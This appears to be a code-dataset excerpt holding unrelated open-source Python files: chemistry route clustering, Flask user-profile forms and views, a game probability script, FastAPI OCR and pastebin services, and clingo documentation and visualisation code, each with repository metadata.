fp = self._compute_fingerprint(node)
dict_tree = {
"type": node.__class__.__name__,
"smiles": node.smiles,
"fingerprint": fp,
"sort_key": "".join(f"{digit}" for digit in fp),
"children": [],
}
for child in self._iter_children(node, order_dict):
child_tree = self._create_tree_recursively(child, order_dict)
dict_tree["children"].append(child_tree)
return dict_tree
def _distance_iter_exhaustive(self, other):
self._logger.debug(
f"APTED: Exhaustive search. {len(self.trees)} {len(other.trees)}"
)
config = AptedConfig(randomize=False)
for tree1, tree2 in itertools.product(self.trees, other.trees):
yield Apted(tree1, tree2, config).compute_edit_distance()
def _distance_iter_random(self, other, ntimes):
self._logger.debug(
f"APTED: Heuristic search. {len(self.trees)} {len(other.trees)}"
)
config = AptedConfig(randomize=False)
yield Apted(self.first_tree, other.first_tree, config).compute_edit_distance()
config = AptedConfig(randomize=True)
for _ in range(ntimes):
yield Apted(
self.first_tree, other.first_tree, config
).compute_edit_distance()
def _distance_iter_semi_exhaustive(self, other):
self._logger.debug(
f"APTED: Semi-exhaustive search. {len(self.trees)} {len(other.trees)}"
)
if len(self.trees) < len(other.trees):
first_wrapper = self
second_wrapper = other
else:
first_wrapper = other
second_wrapper = self
config = AptedConfig(randomize=False)
for tree1 in first_wrapper.trees:
yield Apted(
tree1, second_wrapper.first_tree, config
).compute_edit_distance()
def _inspect_tree(self):
"""
Find the number of children for each node in the tree, which
will be used to compute the number of possible combinations of child orders
Also accumulate the possible child orders for the nodes.
"""
permutations = []
node_index_list = []
for node in self._graph.nodes:
# fmt: off
if (
isinstance(node, Molecule) and self._content is TreeContent.REACTIONS
) or (
not isinstance(node, Molecule) and self._content is TreeContent.MOLECULES
):
continue
# fmt: on
nchildren = len(list(self._iter_children(node)))
permutations.append(math.factorial(nchildren))
if nchildren > 0:
node_index_list.append(
[
{"node": node, "child_order": idx}
for idx in self._index_permutations[nchildren]
]
)
if not permutations:
return 0, []
return np.prod(permutations), node_index_list
def _iter_children(self, node, order_dict=None):
def _generator(node, lookup_node):
if order_dict is None:
for child in self._graph.successors(node):
yield child
else:
children = list(self._graph.successors(node))
if children:
for child_idx in order_dict.get(lookup_node, []):
yield children[child_idx]
if self._content is TreeContent.BOTH:
yield from _generator(node, node)
else:
for succ in self._graph.successors(node):
yield from _generator(succ, node)
def _make_root(self, reaction_tree):
if self._content is TreeContent.REACTIONS:
try:
return next(self._graph.successors(reaction_tree.root))
except StopIteration:
return None
else:
return reaction_tree.root
```
#### File: aizynthfinder/tests/test_clustering.py
```python
import numpy as np
from aizynthfinder.utils.route_clustering.clustering import ClusteringHelper
distance_matrix = np.array(
[
[0.0, 1.0, 20.0, 15.0],
[1.0, 0.0, 17.0, 12.0],
[20.0, 17.0, 0.0, 5.0],
[15.0, 12.0, 5.0, 0.0],
]
)
def test_create_clustering_helper():
helper = ClusteringHelper(distance_matrix)
assert helper.labels is None
def test_make_two_clusters():
helper = ClusteringHelper(distance_matrix)
labels = helper.fixed_clustering(2)
assert labels[0] == labels[1]
assert labels[0] != labels[2]
assert labels[2] == labels[3]
def test_optimize_clusters():
helper = ClusteringHelper(distance_matrix)
labels = helper.optimize()
assert max(labels) == 1
assert labels[0] == labels[1]
assert labels[0] != labels[2]
assert labels[2] == labels[3]
assert len(helper.optimization_scores) == 2
def test_clustering_helper():
labels1 = ClusteringHelper.cluster(distance_matrix, 2)
labels2 = ClusteringHelper.cluster(distance_matrix, 1)
assert list(labels1) == list(labels2)
def test_linkage_matrix():
helper = ClusteringHelper(distance_matrix)
matrix = helper.linkage_matrix()
assert len(matrix) == 3
``` |
{
"source": "0x2b3bfa0/invenio-userprofiles",
"score": 3
} |
#### File: invenio-userprofiles/invenio_userprofiles/forms.py
```python
from __future__ import absolute_import, print_function
from flask_babelex import lazy_gettext as _
from flask_login import current_user
from flask_security.forms import email_required, email_validator, \
unique_user_email
from flask_wtf import FlaskForm
from sqlalchemy.orm.exc import NoResultFound
from wtforms import FormField, StringField, SubmitField
from wtforms.validators import DataRequired, EqualTo, StopValidation, \
ValidationError
from .api import current_userprofile
from .models import UserProfile
from .validators import USERNAME_RULES, validate_username
def strip_filter(text):
"""Filter for trimming whitespace.
:param text: The text to strip.
:returns: The stripped text.
"""
return text.strip() if text else text
def current_user_email(form, field):
"""Field validator to stop validation if email wasn't changed."""
if current_user.email == field.data:
raise StopValidation()
class ProfileForm(FlaskForm):
"""Form for editing user profile."""
username = StringField(
# NOTE: Form field label
_('Username'),
# NOTE: Form field help text
description=_('Required. %(username_rules)s',
username_rules=USERNAME_RULES),
validators=[DataRequired(message=_('Username not provided.'))],
filters=[strip_filter], )
full_name = StringField(
# NOTE: Form label
_('Full name'),
filters=[strip_filter], )
def validate_username(form, field):
"""Wrap username validator for WTForms."""
try:
validate_username(field.data)
except ValueError as e:
raise ValidationError(e)
try:
# Check if username is already taken (if the username is *not*
# found a NoResultFound exception is raised).
user_profile = UserProfile.get_by_username(field.data)
# NOTE: Form validation error.
msg = _('Username already exists.')
if current_userprofile.is_anonymous:
# We are handling a new sign up (i.e. anonymous user) AND a
# the username already exists. Fail.
raise ValidationError(msg)
else:
# We are handling a user editing their profile AND a
# the username already exists.
is_same_user = \
current_user.id == user_profile.user_id
if not is_same_user:
# Username already taken by another user.
raise ValidationError(msg)
except NoResultFound:
return
class EmailProfileForm(ProfileForm):
"""Form to allow editing of email address."""
email = StringField(
# NOTE: Form field label
_('Email address'),
filters=[lambda x: x.lower() if x is not None else x, ],
validators=[
email_required,
current_user_email,
email_validator,
unique_user_email,
],
)
email_repeat = StringField(
# NOTE: Form field label
_('Re-enter email address'),
# NOTE: Form field help text
description=_('Please re-enter your email address.'),
filters=[lambda x: x.lower() if x else x, ],
validators=[
email_required,
# NOTE: Form validation error.
EqualTo('email', message=_('Email addresses do not match.'))
]
)
class VerificationForm(FlaskForm):
"""Form to render a button to request email confirmation."""
# NOTE: Form button label
send_verification_email = SubmitField(_('Resend verification email'))
def register_form_factory(Form):
"""Factory for creating an extended user registration form."""
class CsrfDisabledProfileForm(ProfileForm):
"""Subclass of ProfileForm to disable CSRF token in the inner form.
This class will always be a inner form field of the parent class
`Form`. The parent will add/remove the CSRF token in the form.
"""
def __init__(self, *args, **kwargs):
"""Initialize the object by hardcoding CSRF token to false."""
kwargs = _update_with_csrf_disabled(kwargs)
super(CsrfDisabledProfileForm, self).__init__(*args, **kwargs)
class RegisterForm(Form):
"""RegisterForm extended with UserProfile details."""
profile = FormField(CsrfDisabledProfileForm, separator='.')
return RegisterForm
def confirm_register_form_factory(Form):
"""Factory for creating a confirm register form."""
class CsrfDisabledProfileForm(ProfileForm):
"""Subclass of ProfileForm to disable CSRF token in the inner form.
This class will always be a inner form field of the parent class
`Form`. The parent will add/remove the CSRF token in the form.
"""
def __init__(self, *args, **kwargs):
"""Initialize the object by hardcoding CSRF token to false."""
kwargs = _update_with_csrf_disabled(kwargs)
super(CsrfDisabledProfileForm, self).__init__(*args, **kwargs)
class ConfirmRegisterForm(Form):
"""RegisterForm extended with UserProfile details."""
profile = FormField(CsrfDisabledProfileForm, separator='.')
return ConfirmRegisterForm
def _update_with_csrf_disabled(d=None):
"""Update the input dict with CSRF disabled depending on WTF-Form version.
From Flask-WTF 0.14.0, `csrf_enabled` param has been deprecated in favor of
`meta={csrf: True/False}`.
"""
if d is None:
d = {}
import flask_wtf
from pkg_resources import parse_version
supports_meta = parse_version(flask_wtf.__version__) >= parse_version(
"0.14.0")
if supports_meta:
d.setdefault('meta', {})
d['meta'].update({'csrf': False})
else:
d['csrf_enabled'] = False
return d
```
#### File: invenio-userprofiles/invenio_userprofiles/views.py
```python
from __future__ import absolute_import, print_function
from flask import Blueprint, current_app, flash, render_template, request
from flask_babelex import lazy_gettext as _
from flask_breadcrumbs import register_breadcrumb
from flask_login import current_user, login_required
from flask_menu import register_menu
from flask_security.confirmable import send_confirmation_instructions
from invenio_db import db
from invenio_theme.proxies import current_theme_icons
from speaklater import make_lazy_string
from .api import current_userprofile
from .forms import EmailProfileForm, ProfileForm, VerificationForm, \
confirm_register_form_factory, register_form_factory
from .models import UserProfile
blueprint = Blueprint(
'invenio_userprofiles',
__name__,
template_folder='templates',
)
blueprint_api_init = Blueprint(
'invenio_userprofiles_api_init',
__name__,
template_folder='templates',
)
blueprint_ui_init = Blueprint(
'invenio_userprofiles_ui_init',
__name__,
)
def init_common(app):
"""Post initialization."""
if app.config['USERPROFILES_EXTEND_SECURITY_FORMS']:
security_ext = app.extensions['security']
security_ext.confirm_register_form = confirm_register_form_factory(
security_ext.confirm_register_form)
security_ext.register_form = register_form_factory(
security_ext.register_form)
@blueprint_ui_init.record_once
def init_ui(state):
"""Post initialization for UI application."""
app = state.app
init_common(app)
# Register blueprint for templates
app.register_blueprint(
blueprint, url_prefix=app.config['USERPROFILES_PROFILE_URL'])
@blueprint_api_init.record_once
def init_api(state):
"""Post initialization for API application."""
init_common(state.app)
@blueprint.app_template_filter()
def userprofile(value):
"""Retrieve user profile for a given user id."""
return UserProfile.get_by_userid(int(value))
@blueprint.route('/', methods=['GET', 'POST'])
@login_required
@register_menu(
blueprint, 'settings.profile',
# NOTE: Menu item text (icon replaced by a user icon).
_('%(icon)s Profile', icon=make_lazy_string(
lambda: f'<i class="{current_theme_icons.user}"></i>')),
order=0
)
@register_breadcrumb(
blueprint, 'breadcrumbs.settings.profile', _('Profile')
)
def profile():
"""View for editing a profile."""
# Create forms
verification_form = VerificationForm(formdata=None, prefix="verification")
profile_form = profile_form_factory()
# Process forms
form = request.form.get('submit', None)
if form == 'profile':
handle_profile_form(profile_form)
elif form == 'verification':
handle_verification_form(verification_form)
return render_template(
current_app.config['USERPROFILES_PROFILE_TEMPLATE'],
profile_form=profile_form,
verification_form=verification_form,)
def profile_form_factory():
"""Create a profile form."""
if current_app.config['USERPROFILES_EMAIL_ENABLED']:
return EmailProfileForm(
formdata=None,
username=current_userprofile.username,
full_name=current_userprofile.full_name,
email=current_user.email,
email_repeat=current_user.email,
prefix='profile', )
else:
return ProfileForm(
formdata=None,
obj=current_userprofile,
prefix='profile', )
def handle_verification_form(form):
"""Handle email sending verification form."""
form.process(formdata=request.form)
if form.validate_on_submit():
send_confirmation_instructions(current_user)
# NOTE: Flash message.
flash(_("Verification email sent."), category="success")
def handle_profile_form(form):
"""Handle profile update form."""
form.process(formdata=request.form)
if form.validate_on_submit():
email_changed = False
with db.session.begin_nested():
# Update profile.
current_userprofile.username = form.username.data
current_userprofile.full_name = form.full_name.data
db.session.add(current_userprofile)
# Update email
if current_app.config['USERPROFILES_EMAIL_ENABLED'] and \
form.email.data != current_user.email:
current_user.email = form.email.data
current_user.confirmed_at = None
db.session.add(current_user)
email_changed = True
db.session.commit()
if email_changed:
send_confirmation_instructions(current_user)
# NOTE: Flash message after successful update of profile.
flash(_('Profile was updated. We have sent a verification '
'email to %(email)s. Please check it.',
email=current_user.email),
category='success')
else:
# NOTE: Flash message after successful update of profile.
flash(_('Profile was updated.'), category='success')
``` |
{
"source": "0x307845/Bdo-Stats",
"score": 3
} |
#### File: 0x307845/Bdo-Stats/stats_opti.py
```python
def factorielle(n):
if n == 0:
return 1
else:
return n * factorielle(n-1)
def combin(n, k):
if k > n//2:
k = n-k
x = 1
y = 1
i = n-k+1
while i <= n:
x = (x*i)//y
y += 1
i += 1
return x
def binom(k,n,p) :
return combin(n,k)*pow(p,k)*pow(1-p,n-k)
def cost(market_price,Try,cron) :
cost = (Try*cron+ 1)*2
if cost > market_price:
return [False , cost]
return [True , cost]
def taux_var(p,t) :
i = 1
while True :
a = 1-binom(0,i,p)
if a >= t:
break
i = i + 1
return i , a
def stats(p,t,m,c) :
taux = taux_var(p,t)
cout = cost(m,taux[0],c)
a = taux[0]
if cout[0] == True :
d = a
while True :
cout_b = cost(m,d,c)
d = d +1
if cout_b[0] == False :
break
return [t,a ,cout[0],cout[1] , p , m , d ,c]
a = stats(0.1875,0.70,2000,147)
print("\nProbabilité : " , a[4]*100,'%')
print("Prix du marché :", a[7])
print("Cron par tentative : ", a[7])
print("========================================")
print('Nombre de try pour attendre ', a[0]*100,'% : ' , a[1])
print('Cout total : ', a[3])
print('Rentabilité : ', a[2])
try :
print('Try max :' , a[6])
except :
pass
try :
print('Probabilité max :' , (1-binom(0,8,0.1875))*100)
except :
pass
print('\n\nPrix en Million !')
``` |
{
"source": "0x30c4/FastOCR",
"score": 2
} |
#### File: FastOCR/app/main.py
```python
from uvicorn import run
from fastapi import FastAPI, UploadFile, File, status, HTTPException, Response
from fastapi.middleware.cors import CORSMiddleware
from fastapi_sqlalchemy import DBSessionMiddleware, db
from aiofiles import open as aio_open
from pytesseract import image_to_string
from os.path import join
from uuid import uuid4
from models import Image as ModelImage
# Importing the ENV vars from config
from config import (
DATABASE_URL,
UPLOAD_DIR,
ALLOWED_FILE_EXT,
PORT,
WORKERS,
HOST,
RELOAD,
LOG_LEVEL,
LOG_INI
)
app = FastAPI(
openapi_url="/api/openapi.json",
docs_url="/api/docs"
)
origins = [
"http://192.168.69.55",
"http://192.168.69.3",
"https://ocr.0x30c4.dev",
]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
app.add_middleware(DBSessionMiddleware, db_url=DATABASE_URL)
@app.post("/api/image", status_code=status.HTTP_201_CREATED)
async def process(file: UploadFile = File(...)):
"""
Processes the image and returns the extracted text.
- **file** : The file that need will be processed.
"""
ret_obj = {}
if not file.content_type.lower().endswith(ALLOWED_FILE_EXT):
raise HTTPException(status_code=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE,
detail="File Type Not Supported! Supported File"
f"type [{', '.join(ALLOWED_FILE_EXT)}]")
else:
# Get the image extension.
file_ext = file.content_type.split("/")[1]
# Create ModelImage obj to get the UUID.
image_db = ModelImage(
text="", file_ext=file_ext,
original_file_name=file.filename, uuid=uuid4().hex
)
# Creating file name for the image.
file_name = image_db.uuid.__str__() + "." + file_ext
file_path = join(UPLOAD_DIR, file_name)
# Write image to the disk
async with aio_open(file_path, "wb") as out_file:
while content := await file.read(1024):
await out_file.write(content)
# Extracting text from the image.
image_db.text = image_to_string(file_path)
# Putting the text data on the db.
db.session.add(image_db)
db.session.commit()
if not image_db.text.strip():
image_db.text = 'No Text Was Found!'
ret_obj["text"] = image_db.text
ret_obj["url"] = "uploads/" + file_name
return ret_obj
@app.get("/api/get_images/{uuid}")
async def get_images(response: Response, uuid: str):
"""
Find image by UUID and if the image is found on then
return the images text and other data.
- **uuid** : The UUID of the image that you want to get
data of.
"""
# Making a query for the data.
image: ModelImage = db.session.query(ModelImage).\
filter(ModelImage.uuid == uuid).first()
# If nothing was found then rise a 404 not found exception.
if not image:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="Image Not Fount!"
)
# Don't output the id no
del image.id
return image
if __name__ == "__main__":
run(
"main:app", host=HOST, port=PORT,
log_level=LOG_LEVEL, workers=WORKERS,
reload=RELOAD, log_config=LOG_INI
)
``` |
{
"source": "0x30c4/FastPasteBin",
"score": 2
} |
#### File: app/back-end/main.py
```python
from uvicorn import run, logging
from fastapi_sqlalchemy import DBSessionMiddleware, db
from aiofiles import open as aio_open
from os import environ
from os.path import join
from uuid import uuid4
from typing import Union
from fastapi import (
FastAPI,
UploadFile,
File,
status,
HTTPException,
Request,
)
from starlette.responses import RedirectResponse
from db.models import Bindata as ModelBinData
from configs.config import (
title,
db_url,
BIN_UPLOAD,
APP_URL,
APP_URL_INDEX,
APP_URL_UBIN,
LOG_INI,
version,
terms_of_service,
contact,
license_info,
description,
help_text
)
app = FastAPI(
title=title,
description=description,
version=version,
terms_of_service=terms_of_service,
contact=contact,
license_info=license_info,
openapi_url="/api/openapi.json",
docs_url="/api/docs"
)
app.add_middleware(DBSessionMiddleware, db_url=db_url)
async def write_to_file(file, uuid):
# Write the paste to the disk
try:
# creating the file name with full path
file_path = join(BIN_UPLOAD, uuid)
async with aio_open(file_path, "wb") as out_file:
while content := await file.read(1024):
await out_file.write(content)
except Exception as e:
logging.logging.error(e)
raise HTTPException(status_code=status
.HTTP_500_INTERNAL_SERVER_ERROR,
detail="Couldn't Save The File!")
return True
@app.get("/", status_code=status.HTTP_301_MOVED_PERMANENTLY)
async def index(request: Request) -> RedirectResponse:
"""
This page just redirects browser client's to the WEB front end.
"""
# If the client is requesting from a terminal then return
# the help menu
if "curl" in request.headers.get("user-agent"):
return help_text
return RedirectResponse(url=join(APP_URL, APP_URL_INDEX))
@app.post("/", status_code=status.HTTP_201_CREATED)
async def paste_bin(
request: Request,
file: UploadFile = File(None),
meta_data: str = "",
is_tmp: bool = False,
rf: str = "url",
) -> Union[dict, str]:
"""
This is the main Paste Bin end point that handels new pastes.
"""
# if file is None raise error 415
if file is None:
logging.logging.error("No Data Was Pasted!")
raise HTTPException(status_code=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE,
detail="No data was Pasted!")
# if no content length was providerd with the request
# then raise 411 length required error
if "content-length" not in request.headers:
logging.logging.error("No Content-Length Header!")
raise HTTPException(status_code=status.HTTP_411_LENGTH_REQUIRED,
detail="No Content-Length Header!")
# creating a uniq 32 char uuid version 4
gen_uuid = uuid4().hex
# if write opatarion is successfull then put the related
# data to the paste to the db.
if await write_to_file(file, gen_uuid):
image_db = ModelBinData(
uuid=gen_uuid, meta_data=meta_data,
is_tmp=is_tmp
)
db.session.add(image_db)
db.session.commit()
rf.lower()
ret_obj = None
# building the paste url with the gen_uuid
resp_url = join(APP_URL, APP_URL_UBIN, gen_uuid)
# if the user want's json response then return
# json else by default return just the paste url.
if rf == "json":
ret_obj = {
"uuid": gen_uuid,
"meta_data": meta_data,
"is_tmp": is_tmp,
"url": resp_url
}
elif rf == "url":
ret_obj = resp_url
return ret_obj
# if the writing paste to the disk fails then return a empty response.
return {}
if __name__ == "__main__":
port = int(environ.get("PORT", default=5000))
workers = int(environ.get("WORKERS", default=1))
host = environ.get("HOST", default="0.0.0.0")
log_level = environ.get("LOG_LEVEL", default="info")
reload = int(environ.get("RELOAD", default="1"))
run(
"main:app", host=host, port=port,
log_level=log_level, workers=workers,
reload=reload, log_config=LOG_INI
)
``` |
{
"source": "0x326/academic-code-portfolio",
"score": 4
} |
#### File: Coding Assignments/src/sorting.py
```python
import argparse
import random
from collections import deque
from typing import Iterable, Sequence, Deque, List, Union, Callable, TypeVar
T = TypeVar('V')
def insertion_sorted(array: Union[Sequence[T], List[T]], in_place=True,
key: Callable[[T], int] = lambda item: item) -> Iterable[T]:
"""
Performs an insertion sort on a list. Can either be in-place or out-of-place
:param array: The array to sort
:param in_place: Whether to perform the sort in place
:param key: A function to extract the value each element is to be sorted by
:return: The sorted array
"""
if len(array) <= 1:
return array
if in_place:
# Use non-Pythonic for loop for low-level insertion sort
# First item is already sorted
for index in range(1, len(array)):
item = array[index]
item_key = key(item)
for sorted_index in range(0, index):
sorted_item_key = key(array[sorted_index])
if item_key < sorted_item_key:
array.pop(index)
array.insert(sorted_index, item)
break
return array
else:
sorted_list: Deque[int] = deque(maxlen=len(array))
for item in array:
item_key = key(item)
for sorted_index, sorted_item_key in enumerate(map(key, sorted_list)):
if item_key < sorted_item_key:
sorted_list.insert(sorted_index, item)
break
return sorted_list
def merge_sorted(iter1: Iterable[T], iter2: Iterable[T], key: Callable[[T], int] = lambda item: item) -> Iterable[T]:
"""
Merges two sorted iterables while maintaining sorted order
:param iter1: A sorted iterable
:param iter2: Another sorted iterables
:param key: A function to extract the value each element is to be sorted by
:return: A single sorted iterable
"""
iter1 = iter(iter1)
iter2 = iter(iter2)
item1 = None
item2 = None
try:
item1 = next(iter1)
item1_key = key(item1)
item2 = next(iter2)
item2_key = key(item2)
while True:
if item1_key < item2_key:
yield item1
item1 = None
item1 = next(iter1)
item1_key = key(item1)
else:
yield item2
item2 = None
item2 = next(iter2)
item2_key = key(item2)
except StopIteration:
# Don't forget an item from a non-empty iterable
if item1 is not None:
yield item1
elif item2 is not None:
yield item2
# We can now just empty them out
yield from iter1
yield from iter2
return
def combo_sorted(array: List[T], block_size: int = 32, key: Callable[[T], int] = lambda item: item) -> Iterable[T]:
"""
A combination of insertion sort and merge sort. When length is below ``block_size``, uses insertion sort.
Otherwise, merge sort.
:param array: The list to sort
:param block_size: The maximum threshold for insertion sort
:param key: A function to extract the value each element is to be sorted by
:return: A sorted iterable
"""
if len(array) <= 1:
yield from array
return
if len(array) < block_size:
yield from insertion_sorted(array, key=key)
else:
# Divide and conquer
sorted_left = combo_sorted(array[:len(array) // 2], block_size=block_size, key=key)
sorted_right = combo_sorted(array[len(array) // 2:], block_size=block_size, key=key)
yield from merge_sorted(sorted_left, sorted_right, key=key)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Sort a random array')
parser.add_argument('array_length', metavar='N', type=int, nargs='?', default=320,
help='Length of the array to generate')
parser.add_argument('--block-size', metavar='R', type=int, default=32,
help='Length of the array to generate')
parser.add_argument('--min-value', metavar='R', type=int, default=0,
help='Minimum value for random array (inclusive)')
parser.add_argument('--max-value', metavar='R', type=int, default=5000,
help='Maximum value for random array (inclusive)')
args = parser.parse_args()
for _ in range(20):
# Generate array
array = [random.randint(args.min_value, args.max_value) for _ in range(args.array_length)]
# Sort array
expected_array = tuple(sorted(array))
array = tuple(combo_sorted(array, block_size=args.block_size))
if array != expected_array:
print(f'Expected: {repr(expected_array)}')
print(f'Actual: {repr(array)}')
print()
break
else:
print('All tests pass')
``` |
{
"source": "0x326/clingo",
"score": 2
} |
#### File: py/_gen/gen.py
```python
import os
import re
import pdoc
import clingo
import importlib.machinery
def _is_public(ident_name):
"""
Returns `True` if `ident_name` matches the export criteria for an
identifier name.
"""
return True
#pdoc._is_public = _is_public
clingo.ast.__spec__ = importlib.machinery.ModuleSpec("clingo.ast", None)
clingo.__pdoc__ = {}
pdoc.tpl_lookup.directories.insert(0, './templates')
ctx = pdoc.Context()
cmod = pdoc.Module(clingo, context=ctx)
amod = pdoc.Module(clingo.ast, supermodule=cmod, context=ctx)
cmod.doc["ast"] = amod
cmod.doc["__version__"] = pdoc.Variable("__version__", cmod, "__version__: str\n\nVersion of the clingo module (`'{}'`).".format(clingo.__version__))
cmod.doc["Infimum"] = pdoc.Variable("Infimum", cmod, '''Infimum: Symbol\n\nRepresents a symbol of type `clingo.SymbolType.Infimum`.''')
cmod.doc["Supremum"] = pdoc.Variable("Supremum", cmod, '''Supremum: Symbol\n\nRepresents a symbol of type `clingo.SymbolType.Supremum`.''')
pdoc.link_inheritance(ctx)
prefix = "../clingo/python-api/{}".format(".".join(clingo.__version__.split(".")[:2]))
cprefix = "../clingo/python-api/current"
os.makedirs("{}/ast".format(prefix), exist_ok=True)
os.makedirs("{}/ast".format(cprefix), exist_ok=True)
cmod_html = cmod.html(external_links=True)
amod_html = amod.html(external_links=True)
open("{}/index.html".format(prefix), "w").write(cmod_html)
open("{}/ast/index.html".format(prefix), "w").write(amod_html)
open("{}/index.html".format(cprefix), "w").write(cmod_html.replace("clingo/python-api/5.4", "clingo/python-api/current"))
open("{}/ast/index.html".format(cprefix), "w").write(amod_html.replace("clingo/python-api/5.4", "clingo/python-api/current"))
```
#### File: clingo/robots/visualize.py
```python
import clingo
try:
import Tkinter
except ImportError:
import tkinter as Tkinter
# {{{1 class Board
class Board:
def __init__(self):
self.size = 1
self.blocked = set()
self.barriers = set()
self.targets = set()
self.pos = dict()
self.robots = [{}]
self.moves = []
self.current_target = None
self.solution = None
ctl = clingo.Control()
ctl.load("board.lp")
ctl.ground([("base", [])])
ctl.solve(on_model=self.__on_model)
def __on_model(self, m):
for atom in m.symbols(atoms=True):
if atom.name == "barrier" and len(atom.arguments) == 4:
x, y, dx, dy = [n.number for n in atom.arguments]
self.blocked.add((x - 1 , y - 1 , dx, dy))
self.blocked.add((x - 1 + dx, y - 1 , -dx, dy))
self.blocked.add((x - 1 , y - 1 + dy, dx, -dy))
self.blocked.add((x - 1 + dx, y - 1 + dy, -dx, -dy))
if dy == 0:
self.barriers.add(('west', x if dx == 1 else x - 1, y - 1))
else:
self.barriers.add(('north', x - 1, y if dy == 1 else y - 1))
elif atom.name == "dim" and len(atom.arguments) == 1:
self.size = max(self.size, atom.arguments[0].number)
elif atom.name == "available_target" and len(atom.arguments) == 4:
c, s, x, y = [(n.number if n.type == clingo.SymbolType.Number else str(n)) for n in atom.arguments]
self.targets.add((c, s, x - 1, y - 1))
elif atom.name == "initial_pos" and len(atom.arguments) == 3:
c, x, y = [(n.number if n.type == clingo.SymbolType.Number else str(n)) for n in atom.arguments]
self.pos[c] = (x - 1, y - 1)
for d in range(0, self.size):
self.blocked.add((d , 0, 0, -1))
self.blocked.add((d , self.size - 1, 0, 1))
self.blocked.add((0 , d, -1, 0))
self.blocked.add((self.size - 1, d, 1, 0))
def move(self, robot, dx, dy):
x, y = self.pos[robot]
while (not (x, y, dx, dy) in self.blocked and
not (x + dx, y + dy) in self.pos.values()):
x += dx
y += dy
self.pos[robot] = (x, y)
if (self.solution is not None and
len(self.solution) > 0 and
self.solution[0][0] == robot and
self.solution[0][1] == dx and
self.solution[0][2] == dy):
self.solution.pop(0)
if len(self.solution) == 0:
self.solution = None
else:
self.solution = None
def won(self):
r, _, x, y = self.current_target
return self.pos[r] == (x, y)
# {{{1 class Solver
# NOTE: it would be a nice gimmick to make the search interruptible
class Solver:
def __init__(self, horizon=0):
self.__horizon = horizon
self.__prg = clingo.Control(['-t4'])
self.__future = None
self.__solution = None
self.__assign = []
self.__prg.load("board.lp")
self.__prg.load("robots.lp")
parts = [ ("base", [])
, ("check", [0])
, ("state", [0])
]
for t in range(1, self.__horizon+1):
parts.extend([ ("trans", [t])
, ("check", [t])
, ("state", [t])
])
self.__prg.ground(parts)
self.__prg.assign_external(clingo.Function("horizon", [self.__horizon]), True)
def __next(self):
assert(self.__horizon < 30)
self.__prg.assign_external(clingo.Function("horizon", [self.__horizon]), False)
self.__horizon += 1
self.__prg.ground([ ("trans", [self.__horizon])
, ("check", [self.__horizon])
, ("state", [self.__horizon])
])
self.__prg.assign_external(clingo.Function("horizon", [self.__horizon]), True)
def start(self, board):
self.__assign = []
for robot, (x, y) in board.pos.items():
self.__assign.append(clingo.Function("pos", [clingo.Function(robot), x+1, y+1, 0]))
self.__assign.append(clingo.Function("target",
[ clingo.Function(board.current_target[0])
, board.current_target[2] + 1
, board.current_target[3] + 1
]))
for x in self.__assign:
self.__prg.assign_external(x, True)
self.__solution = None
self.__future = self.__prg.solve(on_model=self.__on_model, async_=True)
def busy(self):
if self.__future is None:
return False
if self.__future.wait(0):
if self.__solution is None:
self.__next()
self.__future = self.__prg.solve(on_model=self.__on_model, async_=True)
return True
else:
self.__future = None
return False
return True
def stop(self):
if self.__future is not None:
self.__future.cancel()
self.__future.wait()
self.__future = None
self.get()
def get(self):
solution = self.__solution
self.__solution = None
for x in self.__assign:
self.__prg.assign_external(x, False)
self.__assign = []
return solution
def __on_model(self, m):
self.__solution = []
for atom in m.symbols(atoms=True):
if atom.name == "move" and len(atom.arguments) == 4:
c, x, y, t = [(n.number if n.type == clingo.SymbolType.Number else str(n)) for n in atom.arguments]
self.__solution.append((c, x, y, t))
self.__solution.sort(key=lambda x: x[3])
p = None
i = 0
for x in self.__solution:
if p is not None and \
p[0] == x[0] and \
p[1] == x[1] and \
p[2] == x[2]:
break
p = x
i += 1
del self.__solution[i:]
# {{{1 class Visualization
class Visualization:
def __init__(self, master, board):
self.__margin = 20
self.__tile_size = 40
self.__canvas_width = None
self.__canvas_height = None
self.__robot_images = {}
self.__target_images = {}
self.__solution_images = []
self.__direction_images = []
self.__entered = set()
self.__slots = {}
self.__highlights = {}
self.__targets = {}
self.__moves = {}
self.__moves_short = {}
self.__robots = {}
self.__barriers = {}
self.__tiles = []
self.__canvas_width = board.size * self.__tile_size + 2 * self.__margin
self.__canvas_height = (1 + board.size) * self.__tile_size + 3 * self.__margin
self.__canvas = Tkinter.Canvas(master, width=self.__canvas_width, height=self.__canvas_height)
self.__canvas.pack()
colors = ['green', 'red', 'blue', 'yellow']
shapes = ['moon', 'sun', 'star', 'saturn']
directions = [('north', 0, -1), ("east", 1, 0), ('south', 0, 1), ('west', -1, 0)]
for orientation in ['left', 'right']:
path = 'img/tile_{orientation}.gif'.format(orientation=orientation)
self.__tiles.append(Tkinter.PhotoImage(file=path))
for direction in ['north', 'west']:
path = 'img/wall_{direction}.gif'.format(direction=direction)
self.__barriers[direction] = (Tkinter.PhotoImage(file=path), -6, -6)
for color in colors:
path = 'img/robot_{color}.gif'.format(color=color)
self.__robots[color] = Tkinter.PhotoImage(file=path)
for shape in shapes:
path = "img/{shape}_{color}.gif".format(shape=shape, color=color)
self.__targets[(color, shape)] = Tkinter.PhotoImage(file=path)
for (direction, dx, dy) in directions:
path = "img/arrow_{color}_{direction}.gif".format(color=color, direction=direction)
self.__moves[(color, dx, dy)] = Tkinter.PhotoImage(file=path)
path = "img/move_{color}_{direction}.gif".format(color=color, direction=direction)
self.__moves_short[(color, dx, dy)] = Tkinter.PhotoImage(file=path)
for x in range(0, board.size):
for y in range(0, board.size):
self.__canvas.create_image(
self.__margin + self.__tile_size * x,
self.__margin + self.__tile_size * y,
anchor=Tkinter.NW,
image=self.__tiles[(x + y) % len(self.__tiles)])
for (t, m, x, y) in board.targets:
self.__target_images[(x, y)] = self.__canvas.create_image(
self.__margin + self.__tile_size * x,
self.__margin + self.__tile_size * y,
anchor=Tkinter.NW,
image=self.__targets[(t,m)])
self.__canvas.itemconfig(
self.__target_images[(x, y)],
state=Tkinter.HIDDEN)
for (r, (x, y)) in board.pos.items():
self.__robot_images[r] = self.__canvas.create_image(
self.__margin + self.__tile_size * x,
self.__margin + self.__tile_size * y,
anchor=Tkinter.NW,
